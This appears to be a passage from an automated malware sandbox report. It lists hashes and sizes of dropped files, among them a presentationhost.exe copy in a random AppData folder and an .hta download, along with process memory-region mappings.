                                          ecb08e224a2f2772d1e53675bedc4b2c50485a41

                                          SHA256

                                          956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd

                                          SHA512

                                          5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f

                                        • C:\Users\Admin\AppData\Roaming\aw5BDkZi\presentationhost.exe

                                          Filesize

                                          109KB

                                          MD5

                                          b2b27ccaded1db8ee341d5bd2c373044

                                          SHA1

                                          1d0f9ca17c0961eeabffc2ba54e16854a13c8a9d

                                          SHA256

                                          e4985a9739637aad4a409c95da33a1304dc17fd6ef9046159b27c0b137a57911

                                          SHA512

                                          0987b11aa110ea6b6f4fe4361e587aff010508251644bdfb681a578fa4726fb56af039d55e0b74682fd7031414f665a98656186b220264c122a47d23751dcee1

                                        • C:\Users\Admin\AppData\Roaming\aw5BDkZi\presentationhost.exe

                                          Filesize

                                          109KB

                                          MD5

                                          b2b27ccaded1db8ee341d5bd2c373044

                                          SHA1

                                          1d0f9ca17c0961eeabffc2ba54e16854a13c8a9d

                                          SHA256

                                          e4985a9739637aad4a409c95da33a1304dc17fd6ef9046159b27c0b137a57911

                                          SHA512

                                          0987b11aa110ea6b6f4fe4361e587aff010508251644bdfb681a578fa4726fb56af039d55e0b74682fd7031414f665a98656186b220264c122a47d23751dcee1

                                        • C:\Users\Admin\Downloads\2380350551.hta

                                          Filesize

                                          21KB

                                          MD5

                                          df1316305178fe428f0d58f4bd80859f

                                          SHA1

                                          5c1e8492a357622d2a7429663e1b1872995421cd

                                          SHA256

                                          7538649dbb401672b157323df22a89b755b82bd4f4123154e8225476a44a6eff

                                          SHA512

                                          a0c589a170594a264f3d0ccf48cb67435025aceefb2dfcc00b031ada6c53c67ee87030ac7f045122a0b10e8af1774fb910b791f98be1814bcca46d23f6df7975

                                        • memory/5732-144-0x0000000000000000-mapping.dmp

                                        • memory/5820-146-0x0000000000000000-mapping.dmp

                                        • memory/5876-157-0x0000000007530000-0x0000000007552000-memory.dmp

                                          Filesize

                                          136KB

                                        • memory/5876-147-0x0000000000000000-mapping.dmp

                                        • memory/5876-156-0x0000000009C90000-0x0000000009D26000-memory.dmp

                                          Filesize

                                          600KB

                                        • memory/5876-155-0x00000000064C0000-0x00000000064DA000-memory.dmp

                                          Filesize

                                          104KB

                                        • memory/5876-152-0x00000000059E0000-0x0000000005A46000-memory.dmp

                                          Filesize

                                          408KB

                                        • memory/5876-150-0x0000000005240000-0x0000000005262000-memory.dmp

                                          Filesize

                                          136KB

                                        • memory/5876-154-0x0000000007610000-0x0000000007C8A000-memory.dmp

                                          Filesize

                                          6.5MB

                                        • memory/5876-158-0x000000000A2E0000-0x000000000A884000-memory.dmp

                                          Filesize

                                          5.6MB

                                        • memory/5876-148-0x0000000002A20000-0x0000000002A56000-memory.dmp

                                          Filesize

                                          216KB

                                        • memory/5876-149-0x0000000005340000-0x0000000005968000-memory.dmp

                                          Filesize

                                          6.2MB

                                        • memory/5876-153-0x0000000006020000-0x000000000603E000-memory.dmp

                                          Filesize

                                          120KB

                                        • memory/5876-151-0x0000000005970000-0x00000000059D6000-memory.dmp

                                          Filesize

                                          408KB

                                        • memory/6040-159-0x0000000000000000-mapping.dmp

                                        • memory/6040-165-0x0000000001510000-0x00000000018AA000-memory.dmp

                                          Filesize

                                          3.6MB